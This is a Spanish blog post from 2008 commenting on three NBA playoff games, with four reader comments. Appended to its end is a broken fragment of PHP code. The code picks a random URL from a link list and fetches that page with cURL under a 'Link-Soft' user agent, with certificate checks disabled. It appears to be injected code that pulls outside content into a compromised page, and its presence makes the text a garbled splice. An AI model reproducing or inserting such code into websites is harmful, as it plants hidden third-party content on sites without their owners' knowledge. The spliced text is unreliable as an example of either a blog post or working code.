“Abandonar” según Carmelo

29 de April de 2008 por telekoman

By TheDeerHunter & Telekoman & Txusma

“Abandonar” según Carmelo (LAL 107 – DEN 101)

Cuando los Lakers arrasaron Denver en el tercer partido de la serie sin mostrar el más mínimo signo de esfuerzo, Carmelo Anthony, como gran líder de este equipo que es, acusó a sus compañeros de haberse borrado del partido. Hay que tener en cuenta que esto lo dijo en caliente, frustrado después de haberse tirado 22 tiros de los 88 de todo su equipo (ni más ni menos que la cuarta parte) y tan sólo haber metido 5. Cabe la posibilidad de que para llegar a soltar tal disparate y no caérsele la cara de vergüenza, todavía le durara la jarana de la juerga que se corrió pocos días antes de empezar la eliminatoria y que terminó con sus huesos de super-estrella en la cárcel. A pesar de todo, sus compañeros trataron de hacerle caso y anoche, a base de intensidad más que de calidad, defendieron el partido hasta casi el final, más concretamente hasta que Carmelo decidió que ya había hecho suficiente y cometió absurdamente su sexta falta para poder así relajar su cansado cuerpo y su esforzada mente hasta el final del partido y de la eliminatoria. Su rostro de malestar tras formar parte del primer equipo en la historia en alcanzar 50 victorias y caer barrido en primera ronda lo decía todo. Malestar ninguno. Algunos compañeros se tapaban la cara para ocultar su desesperación y vergüenza. A Carmelo no le hizo falta pues en ningún momento sintió ni una cosa ni la otra. Al fin y al cabo los derrotados eran sus compañeros.

Esa es la madera de un líder.

Ahogados en sus propias dudas (TOR 92 – ORL 102)

Se debe iniciar un tiempo de reflexión profunda en Toronto sobre lo ocurrido en esta serie que acaba de finalizar con un contundente 4-1 en la ques, salvo el espejismo del tercer partido, el equipo canadiense no ha llegado en ningún momento a inquietar a Orlando. ¿Culpables? Así a primera vista podemos encontrar muchos, en ambos bandos y de diferente signo. Podemos ser amables y decir que los principales culpables han sido los propios Magic, en especial Howard que en 3 de los 5 partidos se ha ido por encima de unos mostruosos 20-20, muy bien apoyado por Turkoglu, como hoy, que se ha acercado al triple doble, y Rashard Lewis que está despertando en el mejor momento. Pero creo que no sería del todo cierto. Los Raptors se han mostrado especialmente inoperantes, ahogados por sus propias dudas. Bosh no ha sido el líder esperado, algo que no es nuevo, Bargnani ha sido un ídolo de barro, el debate TJ-Calderón ha hecho daño, y ninguno de los dos ha despejado dudas y, finalmente, Sam Mitchell ha gestionado horriblemente su plantilla. Mientras tanto en Orlando esperan placidamente el desenlace del Detroit-Philadelphia, con pocas dudas y descansados.

Ah, que no hemos dicho nada del partido… Lamentablemente para todos los seguidores de Toronto, hay poco que decir que no se haya dicho ya. Orlando barrió en puntos, rebotes, asistencias, etc… A destacar los 10 rebotes ofensivos de Howard que dicen mucho de la “alergia” a la pintura de los jugadores de Toronto.

Atlanta believes! (BOS 92 – ATL 97)

A día de hoy, Boston tendría que estar celebrando su pase a la siguiente ronda de playoffs y comenzar a preocuparse de como parar a Lebron y compañía. Habían ganado 66 partidos en Liga Regular, tenían al auténtico “Big Three” de la temporada y además todos sus enfrentamientos anteriores con los Hawks se habían saldado con victoria clara a su favor. Nada hacía pensar que la eliminatoria se les atragantara lo más mínimo, pero estas cosas pasan. La realidad es que a día de hoy Atlanta y Boston han ganado 2 partidos cada uno y, aunque todo el mundo sigue apostando por Boston como ganador final, las dudas y los miedos empiezan a asaltar a algún que otro seguidor verde. Si hace unos días comentábamos que los Hawks saltaban a la cancha con el complejo de los New York Nationals, ese equipo que siempre pierde contra los Harlem Globetrotters, ahora lo cierto es que en Atlanta se lo empiezan a creer y se lo empiezan a creer en serio. Y los Hawks, con confianza, sin miedo, una vez espantada la responsabilidad que otorga el volver a los Playoffs después de muchos años, se convierten en un equipo peligrosísimo del que Garnett y compañía se deberían guardar.

Comenta

4 comentarios a esta entrada

  1. txusma dice:
    #1

    Para mi mucho más sorprendente lo de Atlanta que lo de Philadelphia, aunq creo q las 2 eliminatorias se acabaran resolviendo con un 4-2. Llegar al septimo partido supondria un golpe moral para los 2 grandes favoritos del Este.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Ni una pizquina de Ira Newble,,,será posible.

      Citar

  3. Olafur dice:
    #3

    Lo de Carmelo en playoffs empieza a preocupar porque baja sus promedios de manera clara, y lo que es peor sus porcentajes todos estos años de playoffs son lamentables

    Eso si Karl también tiene mucha parte de culpa, porque en los Lakers- Resto de Mundo de las kedadas he visto mas jugadas que en sus partidos jojojo

      Citar

  4. TheDeerHunter dice:
    #4

    alguien cree que existe posibilidad seria de que Atlanta y/o Philadelphia le hagan un favorzaco a los equipos del oeste???

    yo no sé si son las ganas pero me mojo porque cae uno de ellos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>